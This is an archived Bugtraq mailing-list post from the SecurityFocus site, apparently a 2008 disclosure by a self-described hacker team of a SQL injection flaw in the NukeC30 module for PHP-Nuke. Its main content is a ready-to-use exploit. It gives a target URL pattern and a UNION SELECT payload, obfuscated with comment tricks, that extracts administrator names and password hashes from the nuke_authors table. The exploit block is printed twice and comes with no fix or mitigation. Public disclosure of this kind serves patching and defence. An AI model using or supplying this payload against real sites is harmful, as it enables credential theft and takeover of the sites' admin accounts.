Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
PHP-Nuke Module NukeC30 sql injection
Mar 11 2008 12:22PM
houssamix hotmail fr
-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------
= Author : HouSSaMix from H-T Team
= Script : PHP-Nuke Module NukeC30
Module's Name: NukeC30
Module's Version: 3.0
= BUG : Remote SQL Injection
= Exploit :
http://Target/[path]/modules.php?name=NukeC30&op=ViewCatg&id_catg=[SQL]
[SQL]= -1/**/union/**/select/**/concat(aid,0x3a,pwd),2/**/from/**/nuke_authors/
*where%20admin%20-2
= Greetz : All muslims HaCkers
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------
= Author : HouSSaMix from H-T Team
= Script : PHP-Nuke Module NukeC30
Module's Name: NukeC30
Module's Version: 3.0
= BUG : Remote SQL Injection
= Exploit :
http://Target/[path]/modules.php?name=NukeC30&op=ViewCatg&id_catg=[SQL]
[SQL]= -1/**/union/**/select/**/concat(aid,0x3a,pwd),2/**/from/**/nuke_authors/
*where%20admin%20-2
= Greetz : All muslims HaCkers
[ reply ]